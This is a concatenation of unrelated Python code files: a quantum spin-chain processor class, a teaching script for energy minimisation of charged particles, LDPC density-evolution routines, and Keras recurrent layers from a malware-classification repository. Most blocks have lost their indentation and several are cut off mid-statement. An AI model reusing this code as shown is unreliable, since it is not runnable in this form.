def __init__(self, N, correct_global_phase=True,
sx=0.25, sz=1.0, sxsy=0.1, t1=None, t2=None):
if N <= 1:
raise ValueError(
"Circuit spin chain must have at least 2 qubits. "
"The number of qubits is increased to 2.")
super(CircularSpinChain, self).__init__(
N, correct_global_phase=correct_global_phase,
sx=sx, sz=sz, sxsy=sxsy, t1=t1, t2=t2)
self.set_up_params(sx=sx, sz=sz, sxsy=sxsy)
self.set_up_ops(N)
def set_up_ops(self, N):
super(CircularSpinChain, self).set_up_ops(N)
operator = tensor([sigmax(), sigmax()]) + tensor([sigmay(), sigmay()])
self.pulses.append(
Pulse(operator, [N-1, 0], spline_kind=self.spline_kind))
self.pulse_dict["g" + str(N-1)] = len(self.pulses) - 1
def set_up_params(self, sx, sz, sxsy):
# Doc same as in the parent class
super(CircularSpinChain, self).set_up_params(sx, sz)
sxsy_para = 2 * np.pi * self.to_array(sxsy, self.N)
self._params["sxsy"] = sxsy_para
@property
def sxsy_ops(self):
return self.ctrls[2*self.N: 3*self.N]
@property
def sxsy_u(self):
return self.coeffs[2*self.N: 3*self.N]
def load_circuit(
self, qc, schedule_mode="ASAP", compiler=None):
return super(CircularSpinChain, self).load_circuit(
qc, "circular", schedule_mode=schedule_mode, compiler=compiler)
def get_operators_labels(self):
"""
Get the labels for each Hamiltonian.
It is used in the method ``plot_pulses``.
It is a 2-d nested list; in the plot,
a different color will be used for each sublist.
"""
return ([[r"$\sigma_x^%d$" % n for n in range(self.N)],
[r"$\sigma_z^%d$" % n for n in range(self.N)],
[r"$\sigma_x^%d\sigma_x^{%d} + \sigma_y^%d\sigma_y^{%d}$"
| |
# Repository: haddocking/molmod-education (gh_stars: 0)
#!/usr/local/bin/python
#
###########################################################################
###########################################################################
# Simple EM of <NAME> charged or uncharged particles
# <NAME>, Utrecht University
#
# adapted from a script from <NAME>, Uni. Paris VI
#
###########################################################################
###########################################################################
##################
# import modules #
##################
from math import sqrt,exp,log,sin,cos
from random import random,randint,seed
###########################################################################
###########################################################################
### define parameters #####################################################
###########################################################################
###########################################################################
nAtoms = 20 # number of atoms
Radius = 25.0 # beware that Radius must be in a good range (according to nAtoms)
# in order to be able to place all atoms
Rmin = 2.24 * Radius # Rmin distance parameter of the LJ pair potential (see LJ2 below)
BoxDim = [500,500] # box dimension
Atom_Coord = [] # list of the form : [NMAX][2]
Epsilon = 25.0 # well depth
Dielec = 1.0 # dielectric constant
qat = Radius # Atom absolute charge
frac_neg = 0.5 # Fraction negative charges
OverlapFr = 0.0 # fraction of overlap allowed
CutOff = 250 # non-bonded cutoff
CutOffSquare = CutOff**2
speed = 20 # canvas update speed
cstboltz = 0.00198722 # Boltzmann's constant in kcal/mol/K
cstboltz = 1000*cstboltz/4.18 #in J/mol/K
drinit = 1.00 # dr from EM
drmin = 0.00001 # minimum dr value to step EM
drmax = 5.00 # maximum dr
alpha = 1.05 # scaling factor for dr if Enew < Eold
beta = 0.90 # scaling factor for dr if Enew > Eold
deltaE = 0.001 # energy difference threshold to stop EM
normFmin = 0.001 # minimum force norm to step EM
Seed = 100 # random number seed
###########################################################################
###########################################################################
# Steepest descent minimizer ##############################################
###########################################################################
###########################################################################
def Steepest_descent(atom_coord,drstep,force):
#the first step for Verlet
list=[]
# This function gets as input parameters:
# - atom_coord, a vector containing the x and y position and the charge of the i atoms
# - drstep, the displacement for the minimizer
# - force, a vector containing the x and y components of the force on the atoms
#
# The function return a list array (vector containing the new positions)
#
# Implement in the following loop over all atoms the steepest descent algorithm
#
# A few hints:
# - powers in python are given by **, e.g.: x to the square is x**2
# - squared root x: sqrt(x)
# - avoid dividing by zero
#
# 1) First calculate the norm of the total force vector
#
normf = 0.0
for i in range(len(atom_coord)):
normf=normf+force[i][0]**2.0+force[i][1]**2.0
normf=sqrt(normf)
#
# 2) Then move the particles
#
for i in range(len(atom_coord)):
q=atom_coord[i][2]
r0x=atom_coord[i][0] #coordinates
r0y=atom_coord[i][1]
if (normf > 0):
#
# Insert below the lines defining the new coordinates based on the old ones + forces + drstep
#
# forces are contained in force[i][0] for the x force component and force[i][1] for the y force component
# the step size for the move is given by drstep
#
#
# ====>>>>>
r0xnew=r0x
r0ynew=r0y
# <<<<<====
r0x=r0xnew
r0y=r0ynew
list.append([r0x,r0y,q])
return list,normf
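###########################################################################
# A possible completion of the exercise above (one option, not the official
# solution): steepest descent moves every atom along the direction of the
# total force (i.e. downhill in energy), with a displacement set by drstep.
###########################################################################
def Steepest_descent_example(atom_coord, drstep, force):
    newcoord = []
    # norm of the full force vector over all atoms
    normf = 0.0
    for i in range(len(atom_coord)):
        normf = normf + force[i][0]**2.0 + force[i][1]**2.0
    normf = sqrt(normf)
    for i in range(len(atom_coord)):
        q = atom_coord[i][2]
        r0x = atom_coord[i][0]
        r0y = atom_coord[i][1]
        if normf > 0:
            # move along the normalised force direction, step length drstep
            r0x = r0x + drstep * force[i][0] / normf
            r0y = r0y + drstep * force[i][1] / normf
        newcoord.append([r0x, r0y, q])
    return newcoord, normf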
###########################################################################
###########################################################################
# move particules with EM ################################################
###########################################################################
###########################################################################
def Go(*args):
import sys,time
global Atom_Coord,Radius,BoxDim,Epsilon,Rmin,Cutoff,CutOffSquare,Iterations,Ene,Ene_prev,Accepted
global drstep,drmax,drmin,deltaE,hwtextene1,hwtextene2,alpha,beta,normFmin
global Color,sttext0,ptext2,paccept,Dielec,root,canevas,speed,nout
hwtextene1.destroy()
hwtextene2.destroy()
sttext0.destroy()
if Iterations==0:
nout = 0
drstep = drinit
Ene,EneLJ,EneCoul = Calc_Ene2(Atom_Coord,Epsilon,Rmin,Dielec,CutOffSquare,BoxDim)
Ene_prev=Ene
outtext="Iteration: %8d Epot: %6.1f Elj: %6.1f Ecoul: %6.1f" % (Iterations,Ene,EneLJ,EneCoul)
print(outtext)
nout = nout + 1
Force = Calc_Force2(Atom_Coord,Epsilon,Rmin,Dielec,CutOffSquare,BoxDim)
Atom_Coord, normF=Steepest_descent(Atom_Coord,drstep,Force)
Ene,EneLJ,EneCoul = Calc_Ene2(Atom_Coord,Epsilon,Rmin,Dielec,CutOffSquare,BoxDim)
Ene_diff= Ene - Ene_prev
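# Adaptive step size: grow dr by alpha after a successful (downhill) step,
# shrink it by beta when the energy went up.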
if (Ene_diff < 0.0):
drstep = drstep * alpha
drstep = min(drmax,drstep)
else:
drstep = drstep * beta
Ene_prev=Ene
#update energies
mynewtext="step: %d" % (Iterations)
sttext0=Label(top1,text=mynewtext)
sttext0.pack(side='left')
mynewtext="Epot: %6.1f deltaE: %10.6f dr: %8.6f" % (Ene,Ene_diff,drstep)
hwtextene1=Label(top2,text=mynewtext)
hwtextene1.pack(side='left')
mynewtext="Elj: %6.1f Ecoul: %6.1f" % (EneLJ,EneCoul)
hwtextene2=Label(top3,text=mynewtext)
hwtextene2.pack(side='left')
#apply boudary conditions
for pp in range(len(Atom_Coord)):
for i in range(2): # i=0 -> case x coordinate ; i=1 -> case y coordinate
if Atom_Coord[pp][i] < 0:
Atom_Coord[pp][i] += BoxDim[i]
if Atom_Coord[pp][i] > BoxDim[i]:
Atom_Coord[pp][i] -= BoxDim[i]
#draw new canvas coordinates
for i in range(len(Atom_Coord)):
x1 = Atom_Coord[i][0] + Radius
y1 = Atom_Coord[i][1] + Radius
x2 = Atom_Coord[i][0] - Radius
y2 = Atom_Coord[i][1] - Radius
canevas.coords(ATOM[i],x1,y1,x2,y2)
Iterations=Iterations+1
#print to terminal window
normF = normF/len(Atom_Coord)
if nout == 20:
nout = 0
outtext="Iteration: %8d Epot: %6.1f Elj: %6.1f Ecoul: %6.1f deltaE: %10.6f <normF>: %8.6f dr: %8.6f" % (Iterations,Ene,EneLJ,EneCoul,Ene_diff,normF,drstep)
print(outtext)
if (abs(Ene_diff) < deltaE or drstep < drmin or normF < normFmin ):
print("STOPPING... deltaE<",deltaE,", or drstep<",drmin,", or normF<",normFmin)
outtext="Iteration: %8d Epot: %6.1f Elj: %6.1f Ecoul: %6.1f deltaE: %10.6f <normF>: %8.6f dr: %8.6f" % (Iterations,Ene,EneLJ,EneCoul,Ene_diff,normF,drstep)
print(outtext)
else:
canevas.after(speed,Go)
def reset(*args):
import sys,time
global Atom_Coord,ATOM,Radius,BoxDim,Epsilon,Rmin,Cutoff,CutOffSquare,Iterations,Ene,Ene_prev,Accepted
global drstep,drmax,drmin,deltaE,hwtextene1,hwtextene2,alpha,beta,normFmin
global Color,sttext0,ptext2,paccept,Dielec,root,canevas,speed,nout
hwtextene1.destroy()
hwtextene2.destroy()
sttext0.destroy()
canevas.destroy()
canevas = Canvas(root, width=BoxDim[0], height=BoxDim[1],bg="#ccddff")
canevas.bind("<Button-1>",Go)
Atom_Coord,ATOM,Color=setupall(Atom_Coord,ATOM,Color)
update_ene()
canevas.pack()
Iterations=0
###########################################################################
###########################################################################
### energy functions #####################################################
###########################################################################
###########################################################################
# calculate LJ from the squared distance
def LJ2(distsquare, epsilon, rmin_exp6):
Z = (1/distsquare)**3 * rmin_exp6
return epsilon * Z * (Z-1)
# classical Coulomb from the squared distance
def Coulomb2(r,dielec,qa,qb):
return qa*qb/(dielec*sqrt(r))
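# Quick sanity check of the LJ2 form used here, E = epsilon*Z*(Z-1) with
# Z = (rmin/r)**6: for this particular parametrisation the minimum energy is
# -epsilon/4, reached at r = 2**(1/6) * rmin.  Illustrative only; not used by
# the simulation.
def _check_lj2(epsilon=1.0, rmin=1.0):
    from math import isclose
    r_at_min = 2.0**(1.0/6.0) * rmin
    e_min = LJ2(r_at_min**2, epsilon, rmin**6)
    assert isclose(e_min, -epsilon/4.0, rel_tol=1e-9)
    return e_min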
# Calculate energy Evdw + Ecoulomb (used squared distance)
# version with boundary conditions
def Calc_Ene2(coord,epsilon,rmin,dielec,cutoffsquare,boxdim,elec=1):
Ene = 0.0 ; distsquare = 0
ELJ = 0.0; ECoul=0.0
rmin_exp6 = rmin**6
# doubly nested loop over all particle pairs
for i in range(len(coord)-1):
for j in range(i+1,len(coord)):
# calculate the squared atomic distance
distsquare = 0
for k in range(2):
tmp = coord[j][k] - coord[i][k]
# chooses the nearest image
halfbox = boxdim[k]/2
tmp = tmp - SignR(halfbox,tmp-halfbox) - SignR(halfbox,tmp+halfbox)
distsquare += tmp**2
# compute vdw and Coulomb energy
if distsquare < cutoffsquare:
qa = coord[i][2]
qb = coord[j][2]
vdw = LJ2(distsquare, epsilon, rmin_exp6)
Ene += vdw
ELJ += vdw
if (elec):
CC = Coulomb2(distsquare,dielec,qa,qb)
Ene+=CC
ECoul+=CC
return Ene,ELJ,ECoul
###########################################################################
###########################################################################
### force functions ######################################################
###########################################################################
###########################################################################
# force LJ (use squared distance)
def ForceLJ2(distsquare, epsilon, rmin_exp6,xi):
rij=sqrt(distsquare)
Z = (1/distsquare)**3 * rmin_exp6
dedz=epsilon*(2*Z-1)
dzdr=rmin_exp6*(-6.0/rij**(7.0))
drdx=xi/rij
return dedz*dzdr*drdx
# Force Coulomb (use squared distance)
def ForceCoulomb2(distsquare,dielec,qa,qb,xi):
rij=sqrt(distsquare)
dedr=-1.0*(qa*qb/dielec)*(1/distsquare)
drdx=xi/rij
return dedr*drdx
# Calculate force from Evdw + Ecoulomb (uses squared distance)
def Calc_Force2(coord,epsilon,rmin,dielec,cutoffsquare,boxdim):
Force=[] ; distsquare = 0
rmin_exp6 = rmin**6
# doubly nested loop over all particle pairs
for i in range(len(coord)):
tmpforce=[0.0,0.0]
for j in range(len(coord)):
if not (i==j):
# calculate the squared atomic distance
distsquare = 0
for k in range(2):
tmp = coord[j][k] - coord[i][k]
# chooses the nearest image
halfbox = boxdim[k]/2
tmp = tmp - SignR(halfbox,tmp-halfbox) - SignR(halfbox,tmp+halfbox)
distsquare += tmp**2
# compute vdw force
if distsquare < cutoffsquare:
qa = coord[i][2]
qb = coord[j][2]
fflist=[]
for k in range(2):
tmp = coord[j][k] - coord[i][k]
ff = ForceLJ2(distsquare, epsilon, rmin_exp6,tmp)
ff += ForceCoulomb2(distsquare,dielec,qa,qb,tmp)
fflist.append(ff)
for k in range(2):
tmpforce[k]=tmpforce[k]+fflist[k]
Force.append(tmpforce)
return Force
###########################################################################
###########################################################################
### other functions ######################################################
###########################################################################
###########################################################################
### distance ###
def dist(A,B):
return sqrt((A[0]-B[0])**2+(A[1]-B[1])**2)
### squared distance ###
def dist2(A,B):
return (A[0]-B[0])**2+(A[1]-B[1])**2
### change sign ###
def SignR(a,b):
if b > 0:
return a
else:
return -a
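# SignR implements the minimum-image convention used in Calc_Ene2/Calc_Force2:
#   tmp - SignR(halfbox, tmp - halfbox) - SignR(halfbox, tmp + halfbox)
# maps a raw displacement tmp in (-L, L) onto its nearest periodic image in
# (-L/2, L/2].  Illustrative helper (not called by the simulation):
def minimum_image(tmp, box_length):
    halfbox = box_length / 2
    return tmp - SignR(halfbox, tmp - halfbox) - SignR(halfbox, tmp + halfbox)
# e.g. minimum_image(0.9*L, L) is approximately -0.1*L, while 0.4*L is unchanged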
### color particles based on charge ###
def charge_color(charge,qat):
tmp = "#111111"
if charge == qat:
tmp = "#FFFFFF"
else:
tmp = "#333333"
return tmp
def die(event=0):
import sys
sys.exit()
###########################################################################
###########################################################################
### initialization #######################################################
###########################################################################
###########################################################################
### generates random coordinates ###
def InitConf(n,dim,radius,qat,frac_neg):
seed(Seed)
print("Initializing box, please wait...")
# generate a list of random positions
tmp_coord = []
i = 0
nneg = 0
ntrial = 0
# fix first atom
x = random()*(dim[0]-2*radius)+radius#dim[0]
y = random()*(dim[1]-2*radius)+radius#dim[1]
nneg = int(float(n) * frac_neg)
npos = n - nneg
charge = -qat
if (npos == n): charge = qat
i += 1
if (n==2):
tmp_coord.append([175,300,charge])
else:
tmp_coord.append([x,y,charge])
while(i < nneg):
x = random()*(dim[0]-2*radius)+radius#dim[0]
y = random()*(dim[1]-2*radius)+radius#dim[1]
# check whether the new particle overlaps an existing one
OVERLAP = 1
for j in range(i):
if dist(tmp_coord[j],[x,y]) < (1-OverlapFr)*2*radius:
OVERLAP = 0
if OVERLAP:
charge = -qat
if (n==2):
tmp_coord.append([325,300,charge])
else:
tmp_coord.append([x,y,charge])
i += 1
ntrial = ntrial + 1
if ntrial > 100000:
print("initialisation failed")
print("==> reduce radius or number of atoms")
sys.exit()
while(i < n):
x = random()*(dim[0]-2*radius)+radius#dim[0]
y = random()*(dim[1]-2*radius)+radius#dim[1]
# check whether the new particle overlaps an existing one
OVERLAP = 1
for j in range(i):
if dist(tmp_coord[j],[x,y]) < (1-OverlapFr)*2*radius:
OVERLAP = 0
if OVERLAP:
charge = qat
if (n==2):
tmp_coord.append([325,300,charge])
else:
tmp_coord.append([x,y,charge])
i += 1
ntrial = ntrial + 1
if ntrial > 10**10:
print("initialisation failed")
print("==> reduce radius or number of atoms")
sys.exit()
return tmp_coord
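# A hedged usage sketch for InitConf (all parameter values are illustrative
# assumptions, not the script's defaults): generate 20 non-overlapping
# particles of radius 10 in a 500x500 box, half of them negatively charged.
#
#   BoxDim = [500, 500]
#   Atom_Coord = InitConf(n=20, dim=BoxDim, radius=10, qat=1.0, frac_neg=0.5)
#   # each entry of Atom_Coord is [x, y, charge]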
### generates random charges ###
def InitCharge(n,dim,qat,frac_neg):
global Atom_Coord
print("Initializing charges, please wait...")
i = 0
nneg = 0
nneg = int(float(n) * frac_neg)
npos = n - nneg
charge = -qat
if (npos == n): charge = qat
Atom_Coord[i][2]=charge
i += 1
while(i < nneg):
charge = -qat
Atom_Coord[i][2]=charge
i += 1
# =========================================================================
# repository: xianhegithub/opt_comms
# =========================================================================
import numpy as np
from scipy import stats
from scipy.special import comb
import mkl_fft
from numba import jit
"""
This is a set of functions that calculate the original density evolution for regular and
irregular LDPC codes in the AWGN channel.
"""
def de_reg_ldpc_awgn_orig(pc_0, itermax, m_sup, z_sup, pe_th, dv, dc):
"""
This function runs the original density evolution for a regular LDPC code ensemble in the AWGN channel.
Ref. [1] Channel Codes: Classical and Modern -- <NAME> and <NAME>, Algorithm 9.1 and Example 9.2
:param pc_0: pdf of the message from the channel
:param itermax: maximum number of iterations for the density evolution
:param m_sup: vector that generate the grid of m value, m stands for the message passed between nodes.
m_sup is of form [m_min, m_max, num_ele].
:param z_sup: vector that generate the grid of z value, z is the phi transform of m.
z_sup is of form [z_min, z_max, num_ele].
:param pe_th: the threshold of error probability
:param dv: variable node degree
:param dc: check node degree
:return pe_res: error probability at each iteration above the threshold
"""
pv = pc_0
ll = 0
pe_curr = 0.5
m_inc = (m_sup[1] - m_sup[0]) / (m_sup[2] - 1)
pe_res = np.zeros(itermax)
while ll < itermax and pe_curr > pe_th:
pe_res[ll] = pe_curr
ll = ll + 1
pc = cn_update(m_sup, pv, dc - 1, z_sup)
pv = vn_update(pc_0, pc, dv - 1, m_sup, m_sup)
pe_curr = pv[:int((m_sup[2] - 1) / 2 + 1 + 0.5)].sum() * m_inc
print(pe_curr)
pe_res[ll] = pe_curr
return pe_res[:ll+1]
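# A hedged usage sketch (sigma and the grid sizes below are illustrative
# assumptions, not values prescribed by the reference): run density evolution
# for the regular (dv=3, dc=6) ensemble over an AWGN channel.
#
#   sigma = 0.88
#   m_sup = [-30.0, 30.0, 6001]        # LLR grid: [m_min, m_max, num_ele]
#   z_sup = [-10.0, -1e-4, 3001]       # phi-domain grid, z = log(tanh(|m|/2)) <= 0
#   pc_0, m_grid = ch_msg(m_sup, sigma)
#   pe = de_reg_ldpc_awgn_orig(pc_0, itermax=200, m_sup=m_sup, z_sup=z_sup,
#                              pe_th=1e-6, dv=3, dc=6)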
def de_irreg_ldpc_awgn_orig(pc_0, itermax, m_sup, z_sup, pe_th, lmbda, rho):
"""
This function runs the original density evolution for an irregular LDPC code ensemble in the AWGN channel.
lmbda and rho are the variable-node and check-node degree distributions; index idx corresponds
to node degree idx + 1. The remaining parameters are as in de_reg_ldpc_awgn_orig.
"""
pv_aver = pc_0
ll = 0
pe_curr = 0.5
m_inc = (m_sup[1] - m_sup[0])/(m_sup[2] - 1)
pe_res = np.zeros(itermax)
max_dv = len(lmbda)
max_dc = len(rho)
while ll < itermax and pe_curr > pe_th:
pe_res[ll] = pe_curr
ll = ll + 1
pc_aver = np.zeros(len(pc_0))
for idx in range(1, max_dc):
if rho[idx] != 0:
pc = cn_update(m_sup, pv_aver, idx, z_sup)
pc_aver = pc_aver + rho[idx] * pc
pv_aver = np.zeros(len(pc_0))
for idx in range(1, max_dv):
if lmbda[idx] != 0:
pv = vn_update(pc_0, pc_aver, idx, m_sup, m_sup)
pv_aver = pv_aver + lmbda[idx] * pv
pe_curr = pv_aver[:int((m_sup[2] - 1) / 2 + 1 + 0.5)].sum() * m_inc
print(pe_curr)
return pe_res
def ch_msg(m_sup, sigma):
"""
The channel output message (LLR) is distributed as N(2/sigma^2, 4/sigma^2).
Ref. [1] Channel Codes classical and modern -- <NAME> and <NAME>
page 394, example 9.2
"""
mu_ch = 2/(sigma ** 2)
var_ch_sqrt = 2/sigma
m_inc = (m_sup[1] - m_sup[0])/(m_sup[2] - 1)
m_grid = np.linspace(m_sup[0], m_sup[1], m_sup[2])
pc0 = stats.norm.pdf(m_grid, mu_ch, var_ch_sqrt)
return pc0, m_grid
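# The LLR density above satisfies the Gaussian symmetry condition
# variance = 2 * mean (here 4/sigma^2 = 2 * 2/sigma^2).  A small numerical
# check that the discretised pdf behaves as expected (grid values are
# illustrative assumptions):
def _check_ch_msg(sigma=1.0, m_sup=(-30.0, 30.0, 6001)):
    pc0, m_grid = ch_msg(m_sup, sigma)
    m_inc = (m_sup[1] - m_sup[0]) / (m_sup[2] - 1)
    total = pc0.sum() * m_inc             # should be close to 1
    mean = (pc0 * m_grid).sum() * m_inc   # should be close to 2 / sigma**2
    return total, mean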
def cn_update(m_sup, pv, dcm1, z_sup):
"""
This function updates the check nodes pdf in density evolution.
:param m_sup: vector that generate the grid of m value, m stands for the message passed between nodes.
m_sup is of form [m_min, m_max, num_ele].
:param pv: pdf of the variable-to-check node messages
:param dcm1: check node degree minus 1, i.e., dc - 1
:param z_sup: vector that generate the grid of z value, z is the phi transform of m.
z_sup is of form [z_min, z_max, num_ele].
:return pm_update: p^{(c)} in Algorithm 9.1 step 3 [1]
Ref. [1] Channel Codes: Classical and Modern -- <NAME> and <NAME>, Algorithm 9.1 step 3
"""
m_inc = (m_sup[1] - m_sup[0]) / (m_sup[2] - 1)
z_inc = (z_sup[1] - z_sup[0]) / (z_sup[2] - 1)
p0_zi, p1_zi, excess = phi_trans(m_sup, pv, z_sup)
# the probability density at pv(0) is not handled in the above transform,
# but separately in each of the following steps.
p_zero = pv[int((m_sup[2] - 1) / 2 + 0.5)] * m_inc
# z_extn_sup describes the new bins for the convolved function, because
# convolution unavoidably expands the support of the pdf
z_extn_sup = [z_sup[0]*dcm1, z_sup[0]*dcm1 + z_inc*z_sup[2]*dcm1, z_sup[2]*dcm1 + 1]
pomg_pos, pomg_neg, p_res_zero = cn_fft_convolve(p0_zi, p1_zi, dcm1, z_extn_sup, excess, p_zero)
pm_update, ofl_pos, ofl_neg = phi_trans_inv(pomg_pos, pomg_neg, p_res_zero, z_extn_sup, m_sup)
pm_update = cn_overflow(pm_update, ofl_pos, ofl_neg, m_sup, z_sup)
# normalise the pdf so that it integrates to 1 on the m grid
pm_update = pm_update / (pm_update.sum() * m_inc)
return pm_update
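# Background for cn_update and the phi transform below (a standard density-
# evolution identity, stated here for orientation): the check-node output
# satisfies tanh(m_out/2) = prod_j tanh(m_j/2).  With z = log(tanh(|m|/2)) and
# the sign tracked separately, the product becomes a sum, so the density of
# the check-node message is the (dc-1)-fold convolution that cn_fft_convolve
# evaluates via FFTs.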
def phi_trans(m_sup, pv, z_sup):
"""
converts a probability from LLR to log(tanh(L/2)) form
preserving sign information
note, the zero is dropped! ... but not the underflow
:param m_sup: vector that generate the grid of m value, m stands for the
message passed between nodes. m_sup is of form [m_min, m_max, num_ele]
:param pv: pdf of variable nodes
:param z_sup: vector that generate the grid of z value, z is the phi transform of m.
z_sup is of form [z_min, z_max, num_ele].
:return p0_zi, p1_zi:
Ref. [1] Channel Codes: Classical and Modern -- <NAME> and <NAME>, Algorithm 9.1 step 3, sub-step 1
"""
z_uni_grid = np.linspace(z_sup[0], z_sup[1], int(z_sup[2]))
m_inc = (m_sup[1] - m_sup[0])/(m_sup[2] - 1)
lw_up_grid = np.zeros([2, int((m_sup[2]-1)/2)])
tmp_min = m_inc/2
tmp_max = m_inc/2 + m_inc * (m_sup[2]-3)/2
lw_up_grid[0, :] = np.linspace(tmp_min, tmp_max, int((m_sup[2]-1)/2))
tmp_min = m_inc/2 + m_inc
tmp_max = m_inc/2 + m_inc * (m_sup[2]-3)/2 + m_inc
lw_up_grid[1, :] = np.linspace(tmp_min, tmp_max, int((m_sup[2]-1)/2))
lw_up_grid[0, 0] = m_inc
lw_up_grid[1, -1] = m_inc * (m_sup[2]-3)/2 + m_inc
z_non_grid = np.log(np.tanh(lw_up_grid/2))
coeff = 2 * np.exp(z_uni_grid)/(1 - np.exp(2 * z_uni_grid))
excess = np.zeros(4)
pv_pos = pv[int((m_sup[2]-1)/2)+1:]
p0_zi, ofl, ufl = pm2pz2pm(m_inc, pv_pos, z_non_grid, z_sup, coeff)
excess[0] = ofl
excess[1] = ufl
pv_neg = pv[:int((m_sup[2] - 1)/2)]
pv_neg_rev = pv_neg[::-1]
p1_zi, ofl, ufl = pm2pz2pm(m_inc, pv_neg_rev, z_non_grid, z_sup, coeff)
excess[2] = ofl
excess[3] = ufl
return p0_zi, p1_zi, excess
def phi_trans_inv(pomg_pos, pomg_neg, p_res_zero, z_extn_sup, m_sup):
"""
converts a log(tanh(L/2)) form random variable to LLR
recall that sign information is preserved
:param pomg_pos: p(\omega) z>0
:param pomg_neg: p(\omega) z<0
:param p_res_zero: probability density of z = 0
:param z_extn_sup: vector that generate the EXTENDED grid of z value due to convolution,
z_extn_sup is of form [z_min, z_max, num_ele].
:param m_sup: vector that generate the grid of m value, m stands for the
message passed between nodes. m_sup is of form [m_min, m_max, num_ele]
:return pm_update, ofl_pos, ofl_neg: updated pdf on the m grid plus the positive/negative overflow mass
Ref. [1] Channel Codes: Classical and Modern -- <NAME> and <NAME>, Algorithm 9.1 step 3, sub-step 3
"""
m_inc = (m_sup[1] - m_sup[0]) / (m_sup[2] - 1)
m_pos_min = m_inc
m_pos_num = int((m_sup[2] - 1)/2)
m_pos_max = m_pos_min + m_inc * (m_pos_num - 1)
m_pos_sup = np.array([m_pos_min, m_pos_max, m_pos_num])
m_pos_grid = np.linspace(m_pos_min, m_pos_max, int(m_pos_num))
z_extn_inc = (z_extn_sup[1] - z_extn_sup[0]) / (z_extn_sup[2] - 1)
lw_up_grid = np.zeros([2, int(z_extn_sup[2])])
tmp_min = z_extn_sup[0] - z_extn_inc / 2
tmp_max = z_extn_sup[0] - z_extn_inc / 2 + z_extn_inc * (z_extn_sup[2] - 1)
lw_up_grid[0, :] = np.linspace(tmp_min, tmp_max, int(z_extn_sup[2]))
tmp_min = z_extn_sup[0] + z_extn_inc / 2
tmp_max = z_extn_sup[0] + z_extn_inc / 2 + z_extn_inc * (z_extn_sup[2] - 1)
lw_up_grid[1, :] = np.linspace(tmp_min, tmp_max, int(z_extn_sup[2]))
lw_up_grid[0, 0] = z_extn_sup[0]
tmp = z_extn_sup[0] + z_extn_inc * (z_extn_sup[2] - 1)
if tmp == 0:
tmp = -1.e-6
lw_up_grid[1, -1] = tmp
# this is just 2*atanh(exp(lw_up_grid)), i.e. the inverse of z = log(tanh(m/2))
m_non_grid = np.log((1+np.exp(lw_up_grid)) / (1-np.exp(lw_up_grid)))
tmp_vc = np.tanh(m_pos_grid / 2)
coeff = 0.5 / tmp_vc * (1 - np.power(tmp_vc, 2))
pm_pos, ofl_pos, ufl_pos = pm2pz2pm(z_extn_inc, pomg_pos, m_non_grid, m_pos_sup, coeff)
pm_neg, ofl_neg, ufl_neg = pm2pz2pm(z_extn_inc, pomg_neg, m_non_grid, m_pos_sup, coeff)
pm_update = np.zeros(m_sup[2])
tmp_vc = pm_neg[:int((m_sup[2] - 1) / 2)]
pm_update[:int((m_sup[2] - 1) / 2)] = tmp_vc[::-1]
pm_update[int((m_sup[2] - 1) / 2 + 1):] = pm_pos
pm_update[int((m_sup[2] - 1) / 2)] = (p_res_zero + ufl_pos + ufl_neg) / m_inc
return pm_update, ofl_pos, ofl_neg
@jit(nopython=True)
def pm2pz2pm(m_inc, pv_half, z_non_grid, z_sup, coeff):
itmax = len(z_non_grid[0])
z_ele_num = int(z_sup[2])
pzi = np.zeros(z_ele_num)
ofl = 0.
ufl = 0.
z_inc = (z_sup[1] - z_sup[0])/(z_ele_num - 1)
min_res_bin = z_sup[0] - 0.5 * z_inc
max_res_bin = z_sup[1] + 0.5 * z_inc
for cc in range(itmax):
ztmp = (z_non_grid[:, cc] - z_sup[0]) / z_inc + 0.5
z_in_z_uni_head = int(ztmp[0])
z_in_z_uni_tail = int(ztmp[1])
flag = 0
partflag = 0
# higher range exceeded by both, this part of pv is added into ofl
if z_in_z_uni_head > z_ele_num-1 and z_in_z_uni_tail > | |
# =========================================================================
# repository: santacml/Malware-as-Video
# =========================================================================
import tensorflow as tf
from keras import backend as K
from keras.engine import InputSpec
from keras.layers import *
from keras.layers import RNN
from keras.engine.topology import Layer
from keras.layers.recurrent import _generate_dropout_mask
from keras.utils.generic_utils import has_arg
from kerasLayers import *
from keras.optimizers import Optimizer
import numpy as np
import warnings
# explicit imports for names used below (some may already be pulled in via the wildcard imports above)
from keras import activations, initializers, regularizers, constraints
from keras.utils import conv_utils
from keras.legacy import interfaces
'''
# from keras documentation
class MyLayer(Layer):
def __init__(self, output_dim, **kwargs):
self.output_dim = output_dim
super(MyLayer, self).__init__(**kwargs)
def build(self, input_shape):
# Create a trainable weight variable for this layer.
self.kernel = self.add_weight(name='kernel',
shape=(input_shape[1], self.output_dim),
initializer='uniform',
trainable=True)
super(MyLayer, self).build(input_shape) # Be sure to call this somewhere!
def call(self, x):
return K.dot(x, self.kernel)
def compute_output_shape(self, input_shape):
return (input_shape[0], self.output_dim)
'''
# copied from Keras source
def _generate_dropout_mask(ones, rate, training=None, count=1):
def dropped_inputs():
return K.dropout(ones, rate)
if count > 1:
return [K.in_train_phase(
dropped_inputs,
ones,
training=training) for _ in range(count)]
return K.in_train_phase(
dropped_inputs,
ones,
training=training)
# based on the ConvLSTM2D class
class MinConvRNN(ConvRNN2D):
@interfaces.legacy_convlstm2d_support
def __init__(self, filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation='hard_sigmoid',
recurrent_activation='hard_sigmoid',
use_bias=True,
kernel_initializer='glorot_uniform',
recurrent_initializer='orthogonal',
bias_initializer='zeros',
unit_forget_bias=True,
kernel_regularizer=None,
recurrent_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
recurrent_constraint=None,
bias_constraint=None,
return_sequences=False,
go_backwards=False,
stateful=False,
dropout=0.,
recurrent_dropout=0.,
**kwargs):
cell = MinConvRNNCell(filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activation,
recurrent_activation=recurrent_activation,
use_bias=use_bias,
kernel_initializer=kernel_initializer,
recurrent_initializer=recurrent_initializer,
bias_initializer=bias_initializer,
unit_forget_bias=unit_forget_bias,
kernel_regularizer=kernel_regularizer,
recurrent_regularizer=recurrent_regularizer,
bias_regularizer=bias_regularizer,
kernel_constraint=kernel_constraint,
recurrent_constraint=recurrent_constraint,
bias_constraint=bias_constraint,
dropout=dropout,
recurrent_dropout=recurrent_dropout)
super(MinConvRNN, self).__init__(cell,
return_sequences=return_sequences,
go_backwards=go_backwards,
stateful=stateful,
**kwargs)
